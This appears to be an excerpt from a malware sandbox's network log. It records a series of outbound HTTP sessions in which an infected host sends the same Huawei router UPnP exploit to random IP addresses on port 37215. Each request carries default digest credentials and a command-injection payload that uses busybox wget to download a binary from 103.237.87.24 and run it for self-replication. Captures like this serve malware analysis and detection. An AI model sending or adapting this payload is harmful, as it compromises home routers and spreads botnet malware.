                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1309192.168.2.1334810157.184.37.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453748941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1310192.168.2.1337918157.172.237.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.453809977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1311192.168.2.1350376197.113.28.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.454384089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1312192.168.2.135520641.90.75.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.454397917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1313192.168.2.134956841.239.73.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.454494953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1314192.168.2.1349622163.209.100.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.454546928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1315192.168.2.135529241.214.241.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.454565048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1316192.168.2.135661841.182.30.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455131054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1317192.168.2.1335734202.242.118.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455238104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1318192.168.2.1346134197.73.111.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455298901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 